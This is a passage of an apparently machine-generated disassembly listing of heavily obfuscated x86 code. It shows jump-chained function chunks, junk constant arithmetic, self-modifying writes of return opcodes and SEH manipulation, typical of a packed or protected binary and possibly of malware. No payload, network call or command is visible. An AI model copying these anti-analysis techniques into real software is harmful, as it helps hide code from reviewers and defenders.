xor eax, 0A449812Ch
add eax, ebp
jmp loc_44405D
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459019
loc_4461F8: ; CODE XREF: sub_459019:loc_4407C6j
mov byte ptr [eax], 0C3h
jmp loc_43BA7F
; END OF FUNCTION CHUNK FOR sub_459019
; =============== S U B R O U T I N E =======================================
sub_446200 proc near ; CODE XREF: sub_406214+27p
; sub_40DE1D+134p ...
call sub_446215
jmp ds:off_41D150
sub_446200 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439280
loc_44620B: ; CODE XREF: sub_439280+E9DCj
jmp loc_43D706
; END OF FUNCTION CHUNK FOR sub_439280
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_446210: ; CODE XREF: sub_439170+15j
jmp loc_44C83A
; END OF FUNCTION CHUNK FOR sub_439170
; =============== S U B R O U T I N E =======================================
sub_446215 proc near ; CODE XREF: sub_446200p
; sub_43CEF8:loc_44C812j ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439634 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044080E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004435A6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B644 SIZE 00000005 BYTES
jz loc_439634
jmp loc_44B644
sub_446215 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D26E
loc_446220: ; CODE XREF: sub_44D26E+349j
or edi, 516E9771h
add edi, 62ED78D0h
call sub_44551B
loc_446231: ; CODE XREF: ut7h7i2x:0045ABECj
jmp loc_439F9A
; END OF FUNCTION CHUNK FOR sub_44D26E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_446236: ; CODE XREF: sub_43CA2D+EB4Fj
jz loc_443D12
jmp loc_450923
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_446241: ; CODE XREF: sub_458CBB:loc_4454A1j
add ecx, 0F52FD6CCh
mov [ecx], eax
pop ecx
lea eax, sub_4482D0
mov byte ptr [eax], 0C3h
jmp loc_44E7A3
; END OF FUNCTION CHUNK FOR sub_458CBB
; =============== S U B R O U T I N E =======================================
sub_446258 proc near ; CODE XREF: sub_41946E+B1p
; ut7h7i2x:00458904j
; DATA XREF: ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043901B SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043B279 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043B91E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F14B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00440F1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443498 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449451 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004495C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DE59 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F196 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FE53 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045373A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00458370 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AA8C SIZE 00000005 BYTES
push eax
jmp loc_443498
sub_446258 endp
; ---------------------------------------------------------------------------
loc_44625E: ; CODE XREF: ut7h7i2x:0044FD7Aj
call sub_453354
; START OF FUNCTION CHUNK FOR sub_441765
loc_446263: ; CODE XREF: sub_441765+17F7Bj
jmp loc_43EFB4
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
push edx
push 5CBD030h
pop edx
sub edx, 0B423391Bh
jns loc_43A6AE
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_44627B: ; CODE XREF: sub_43ADDB+108AFj
jmp loc_45A315
; END OF FUNCTION CHUNK FOR sub_43ADDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44305D
loc_446280: ; CODE XREF: sub_44305D+Cj
jmp loc_4541D6
; END OF FUNCTION CHUNK FOR sub_44305D
; ---------------------------------------------------------------------------
adc ecx, 0C0FD3F1Eh
jmp loc_43A6A6
; ---------------------------------------------------------------------------
loc_446290: ; DATA XREF: ut7h7i2x:004579F4o
cmp dword ptr [ebp-8], 0
jz loc_43973A
jmp loc_43F825
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_44629F: ; CODE XREF: sub_45742F:loc_447505j
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_4462A5: ; CODE XREF: sub_447CBE-89E1j
jmp loc_4588FC
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
dw 0D91Bh
dword_4462AC dd 0B9CFC19h ; DATA XREF: sub_44EE57+6r
; =============== S U B R O U T I N E =======================================
sub_4462B0 proc near ; CODE XREF: sub_4044D2-1CCp
; sub_408B90+15p
; DATA XREF: ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043A3BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BA03 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043BB15 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BE79 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C8A3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D56D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F4D8 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00442A74 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443569 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004471F5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447AB6 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448827 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B155 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044B256 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C57D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044CB69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D012 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E973 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044F1ED SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00451116 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004511AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045180D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00453BAA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00453D4A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454439 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045479A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004547AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004548F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564C3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456FC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004595F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045970D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004597FA SIZE 0000000B BYTES
jno loc_443569
mov eax, ds:dword_44B964
or eax, eax
jmp loc_4595CE
sub_4462B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4462C3: ; CODE XREF: ut7h7i2x:0043B29Fj
xor edi, 99784D9Dh
add edi, 0A3423522h
mov [edi], eax
pop edi
lea eax, nullsub_511
jmp loc_4439BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4462DD: ; CODE XREF: sub_43FF65:loc_43C390j
jge loc_453547
loc_4462E3: ; CODE XREF: sub_43A5C0+543Ej
jmp loc_45256A
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
add edi, 0B2CD5AE0h
sbb edi, 66A1EAA7h
shr ecx, 9
jmp loc_45353F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_4462FC: ; CODE XREF: sub_44FDF2-AFF5j
test ebx, 0B269F100h
jmp loc_44912B
; END OF FUNCTION CHUNK FOR sub_44FDF2
; ---------------------------------------------------------------------------
loc_446307: ; CODE XREF: ut7h7i2x:0043A591j
jns loc_44F753
popf
jmp sub_44A3F1
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_446314: ; CODE XREF: sub_446F56+12FFEj
jmp sub_452E7F
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
db 91h, 68h, 58h
dword_44631C dd 1B1E7348h ; DATA XREF: sub_459B58:loc_44D65Cr
; =============== S U B R O U T I N E =======================================
sub_446320 proc near ; CODE XREF: sub_4054D7+49p
; sub_405543+49p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A439 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043AF65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C268 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D069 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DDC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EE17 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00443784 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004452AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447020 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447B07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448099 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00448883 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004490D4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449D41 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044C52C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DA8E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E6A2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044FDBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454423 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455DFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045891F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458CEB SIZE 0000000D BYTES
jb loc_448883
mov eax, ds:dword_43EECC
jmp loc_443784
sub_446320 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 0C27963F8h
push offset loc_445F06
jmp loc_440C2B
; ---------------------------------------------------------------------------
loc_446340: ; CODE XREF: ut7h7i2x:004485D9j
mov eax, [esp]
push ecx
mov ecx, edx
xchg ecx, [esp]
call sub_44D8E8
push 2996A420h
pop eax
jmp loc_454591
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459485
loc_446359: ; CODE XREF: sub_459485-1610Aj
push offset sub_456F1D
jmp nullsub_380
; END OF FUNCTION CHUNK FOR sub_459485
; ---------------------------------------------------------------------------
loc_446363: ; CODE XREF: ut7h7i2x:0044B23Ej
and eax, 0D0AE4276h
rol eax, 13h
add eax, 77749C42h
xor eax, 8F22A1C8h
call sub_43AA94
push esi
push 0F0CF6C89h
jmp loc_43B648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_446388: ; CODE XREF: sub_44A3BB+F650j
mov [eax], ebp
jbe loc_44E1A4
loc_446390: ; CODE XREF: ut7h7i2x:00441278j
; ut7h7i2x:00448127j ...
mov esp, ebp
xchg esi, [esp+0]
mov ebp, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_446399: ; CODE XREF: sub_43F1B2+8A29j
jmp loc_452E49
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
loc_44639E: ; CODE XREF: ut7h7i2x:00440554j
jmp loc_45491F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_4463A3: ; CODE XREF: sub_44A3BB:loc_4432EAj
push offset sub_454B2B
jmp loc_448317
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_4463AD: ; CODE XREF: sub_445FA9:loc_4406CFj
mov eax, [esp-8+arg_4]
push edx
call sub_4396F5
mov eax, 0D6CB94Ch
push ecx
push 85EEA37Eh
pop ecx
jmp loc_43E7B7
; END OF FUNCTION CHUNK FOR sub_445FA9
; =============== S U B R O U T I N E =======================================
sub_4463C7 proc near ; DATA XREF: sub_45A84B-1D42Ao
pop ecx
lea eax, sub_443CE1
mov byte ptr [eax], 0C3h
jmp sub_443CE1
sub_4463C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4463D6 proc near ; CODE XREF: sub_419F99+2Ap
; sub_419F99+5Dp ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A2CE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E910 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EC52 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043EFAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044183A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A5C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448F1B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449720 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE80 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00451F07 SIZE 00000017 BYTES
push eax
jmp loc_43EFAF
sub_4463D6 endp
; ---------------------------------------------------------------------------
loc_4463DC: ; CODE XREF: ut7h7i2x:0043F5B3j
call sub_45499E
push offset sub_45984E
jmp loc_458E98
; ---------------------------------------------------------------------------
loc_4463EB: ; CODE XREF: ut7h7i2x:loc_43A066j
mov ebp, ecx
pop ecx
push 2B54F134h
xchg esi, [esp]
mov eax, esi
pop esi
and eax, 1EA91972h
rol eax, 0Ch
jmp loc_440CE2
; ---------------------------------------------------------------------------
loc_446407: ; CODE XREF: ut7h7i2x:0045472Fj
jb loc_43F47A
mov [ebx], esi
; =============== S U B R O U T I N E =======================================
sub_44640F proc near ; CODE XREF: ut7h7i2x:0043D905p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004399D8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443EBC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044800D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C488 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045919B SIZE 00000016 BYTES
xchg ecx, [esp+0]
pop ecx
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_44CD53
jmp loc_443EBC
sub_44640F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_446424: ; CODE XREF: ut7h7i2x:0044CA55j
sbb ebx, eax
loc_446426: ; CODE XREF: ut7h7i2x:loc_441CD2j
cmp dword ptr [ebp-108h], 6C436E6Fh
jnz loc_442C9A
jmp loc_458BCB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_44643B: ; CODE XREF: sub_4471CA:loc_439CD0j
; sub_4471CA+6441j
push edi
push 26D2353Bh
xor edi, 591526BCh
jmp loc_457713
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
push edx
mov edx, eax
xchg edx, [esp]
push 8C9F1512h
pop eax
jmp loc_43A197
; ---------------------------------------------------------------------------
test ebp, 71012B36h
loc_446463: ; CODE XREF: ut7h7i2x:loc_43D2DBj
jmp loc_442980
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_446468: ; CODE XREF: sub_44B72F+E1ACj
mov [edi], edx
or edx, edi
loc_44646C: ; CODE XREF: sub_44B72F:loc_4598CFj
xor esi, 2D98848Eh
add esi, ebp
add esi, 35B0166Ch
mov [esi], eax
pop esi
popf
jmp loc_43CC44
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
loc_446483: ; CODE XREF: ut7h7i2x:0043EF6Ej
rol ecx, 0Dh
shr ebx, 6
loc_446489: ; CODE XREF: ut7h7i2x:loc_43929Dj
call sub_452CE7
loc_44648E: ; CODE XREF: ut7h7i2x:00450575j
mov [edi], ecx
; =============== S U B R O U T I N E =======================================
sub_446490 proc near ; CODE XREF: ut7h7i2x:00458F18p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00459E0F SIZE 00000014 BYTES
xchg ebx, [esp+0]
pop ebx
xchg ebp, [esp-4+arg_0]
mov eax, ebp
pop ebp
jmp loc_459E0F
sub_446490 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_44649F: ; CODE XREF: sub_446599+4A1Dj
xchg edx, [ebp+0]
mov [eax], ebp
xchg ecx, [eax]
loc_4464A6: ; CODE XREF: sub_446599+4A15j
add edi, 34C8594Eh
xor edi, 0AFD6744Eh
jmp loc_439CC6
; END OF FUNCTION CHUNK FOR sub_446599
; =============== S U B R O U T I N E =======================================
sub_4464B7 proc near ; CODE XREF: sub_43F058+3j
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043DBDB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E57B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004442AE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004451FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448787 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044A79C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B88B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EFDE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457EB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458FE7 SIZE 0000000B BYTES
add esp, 0FFFFFFF8h
call sub_43F82A
loc_4464BF: ; CODE XREF: sub_4448AF-9C3Ej
jmp loc_4451FD
sub_4464B7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449AD9
loc_4464C4: ; CODE XREF: sub_449AD9+13j
jge loc_45702C
; END OF FUNCTION CHUNK FOR sub_449AD9
; START OF FUNCTION CHUNK FOR sub_456CBD
loc_4464CA: ; CODE XREF: sub_456CBD-AD9j
jmp loc_43D74D
; END OF FUNCTION CHUNK FOR sub_456CBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_4464CF: ; CODE XREF: sub_445188+D355j
jmp loc_4533D3
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B4F
loc_4464D4: ; CODE XREF: sub_452B4F-3BE2j
jmp nullsub_310
; END OF FUNCTION CHUNK FOR sub_452B4F
; ---------------------------------------------------------------------------
and edi, 0DC5108BBh
adc ecx, ebx
not edx
jmp loc_457025
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B873
loc_4464E8: ; CODE XREF: sub_43B873:loc_452417j
mov byte ptr [eax], 0C3h
jmp sub_43B873
; ---------------------------------------------------------------------------
loc_4464F0: ; CODE XREF: sub_43B873j
pop edx
mov eax, [esp-4+arg_0]
push offset sub_458054
jmp loc_450338
; END OF FUNCTION CHUNK FOR sub_43B873
; =============== S U B R O U T I N E =======================================
sub_4464FE proc near ; DATA XREF: sub_448321+15DCo
; FUNCTION CHUNK AT 0043BC91 SIZE 0000000B BYTES
pushf
push 81F5AA14h
pop eax
rol eax, 1Fh
test eax, 80h
jmp loc_43BC91
sub_4464FE endp
; ---------------------------------------------------------------------------
locret_446513: ; CODE XREF: ut7h7i2x:004548ACj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_446514: ; CODE XREF: sub_45292B+3j
call sub_455E0B
loc_446519: ; CODE XREF: ut7h7i2x:00456C55j
ror ecx, 1Ah
and ebx, eax
loc_44651E: ; CODE XREF: sub_439BF8:loc_456C44j
add edx, 0B626D071h
add edx, ebp
add edx, 0B2BE1EACh
loc_44652C: ; CODE XREF: ut7h7i2x:0044C0EFj
jmp loc_45431F
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
or eax, eax
jnz loc_4557FC
jmp loc_4529B2
; ---------------------------------------------------------------------------
test eax, eax
jnz loc_44B0E4
jmp loc_444545
; ---------------------------------------------------------------------------
loc_44654B: ; DATA XREF: sub_43AED9:loc_43F8F5o
mov eax, [eax]
call sub_459E54
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_446552: ; CODE XREF: sub_44AA54-7F38j
shl ebx, 17h
loc_446555: ; CODE XREF: sub_44AA54:loc_4495A3j
push 0CF6C0912h
pop eax
sub eax, 7DDEB790h
jmp loc_454A01
; END OF FUNCTION CHUNK FOR sub_44AA54
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459935
loc_446567: ; CODE XREF: sub_459935+12j
jmp loc_445C61
; END OF FUNCTION CHUNK FOR sub_459935
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44656C: ; CODE XREF: sub_43A556+19994j
jmp loc_458FBE
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_446571: ; CODE XREF: ut7h7i2x:00453BC6j
cdq
sub esi, ebp
jmp loc_44F1ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44102C
loc_446579: ; CODE XREF: sub_44102C:loc_44A305j
pop edx
lea eax, sub_45002D
mov byte ptr [eax], 0C3h
jmp sub_45002D
; END OF FUNCTION CHUNK FOR sub_44102C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45002D
loc_446588: ; CODE XREF: sub_45002Dj
pop edx
mov eax, [esp+0]
push edx
push esi
jmp loc_44CB07
; END OF FUNCTION CHUNK FOR sub_45002D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_329. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444E04
loc_446594: ; CODE XREF: sub_444E04+9j
jmp loc_452827
; END OF FUNCTION CHUNK FOR sub_444E04
; =============== S U B R O U T I N E =======================================
sub_446599 proc near ; CODE XREF: sub_44FA51+6p
; sub_44FA51:loc_458822p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439CC6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A089 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EB54 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445B5F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044649F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447424 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044895F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044AFA1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044EBE3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452357 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C6B SIZE 00000005 BYTES
push large dword ptr fs:0
loc_4465A0: ; CODE XREF: ut7h7i2x:loc_4536D4j
mov large fs:0, esp
mov eax, large fs:20h
or eax, eax
jmp loc_44EBE3
sub_446599 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455383
loc_4465B5: ; CODE XREF: sub_455383-16960j
jo loc_456B47
pop edx
jmp loc_45A7FB
; END OF FUNCTION CHUNK FOR sub_455383
; ---------------------------------------------------------------------------
loc_4465C1: ; CODE XREF: ut7h7i2x:00449176j
jb loc_455F0C
and ebp, edx
loc_4465C9: ; CODE XREF: ut7h7i2x:loc_44E744j
cmp dword ptr [ebp-108h], 436E6F4Dh
jnz loc_459C6C
jmp loc_44A1CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_4465DE: ; CODE XREF: sub_444273-58D8j
not esi
cdq
popf
shr ecx, 7
jmp loc_45603F
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
shr ebx, 14h
jmp loc_457ADC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EB8A
loc_4465F2: ; CODE XREF: sub_43EB8A+12FBFj
; sub_43EB8A:loc_45745Fj
xor ecx, 94F50856h
sub eax, ecx
pop ecx
mov ds:dword_43EECC, eax
jmp loc_442F00
; END OF FUNCTION CHUNK FOR sub_43EB8A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_446607: ; CODE XREF: sub_44445F+5BFFj
jmp loc_455F5F
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_44660C: ; CODE XREF: sub_4442CC-49B0j
jmp loc_449EC6
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_446611: ; CODE XREF: sub_45854D-1CB65j
jmp nullsub_336
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_446616: ; CODE XREF: sub_43AA94+6j
jmp loc_447F4D
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44661B: ; CODE XREF: sub_457A66-1D1DDj
jmp loc_44E46B
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_446620: ; CODE XREF: sub_43CCC3+1DC87j
rol eax, 11h
push offset sub_440482
jmp nullsub_463
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
db 7Ah, 30h, 22h
dword_446630 dd 0 ; DATA XREF: sub_43DBEC+1C89Ew
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_446634: ; CODE XREF: sub_439BD1+203D9j
jmp nullsub_414
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_446639: ; CODE XREF: ut7h7i2x:00450136j
jmp sub_456520
; ---------------------------------------------------------------------------
dw 0D48Ch
dword_446640 dd 0 ; DATA XREF: sub_44F738-A344r
; sub_44E2E0+144Dw
dword_446644 dd 0 ; DATA XREF: sub_44941C-D4E6r
; sub_457541-132F4r ...
dword_446648 dd 986951DFh ; DATA XREF: sub_451BEC+4w
; ut7h7i2x:00458FA8w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580B3
loc_44664C: ; CODE XREF: sub_4580B3+8j
jmp loc_45093E
; END OF FUNCTION CHUNK FOR sub_4580B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4543E9
loc_446651: ; CODE XREF: sub_4543E9-E34Cj
jmp sub_43BA59
; END OF FUNCTION CHUNK FOR sub_4543E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_446656: ; CODE XREF: sub_44865D-7836j
jmp loc_4391DB
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
db 0AAh
dword_44665C dd 6EEFCE0Dh ; DATA XREF: sub_44DB48r sub_4532E3+4w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A599
loc_446660: ; CODE XREF: sub_45A599-1AED7j
jmp nullsub_437
; END OF FUNCTION CHUNK FOR sub_45A599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FF0
loc_446665: ; CODE XREF: sub_449FF0+7j
push 0A2B3021Bh
pop edx
xor edx, 56538394h
sub edx, ds:4000F9h
add edx, 1D1A4A8Ch
jmp loc_444B0F
; END OF FUNCTION CHUNK FOR sub_449FF0
; ---------------------------------------------------------------------------
ror edx, 5
jmp loc_43D682
; =============== S U B R O U T I N E =======================================
sub_44668A proc near ; CODE XREF: sub_44FC60-5926j
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044803D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E799 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456153 SIZE 0000000E BYTES
push ebp
sbb ebp, 0F551432Bh
jmp loc_44803D
sub_44668A endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_230. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450987
loc_446697: ; CODE XREF: sub_450987+3j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_450987
; ---------------------------------------------------------------------------
loc_44669C: ; DATA XREF: sub_445B34+C153o
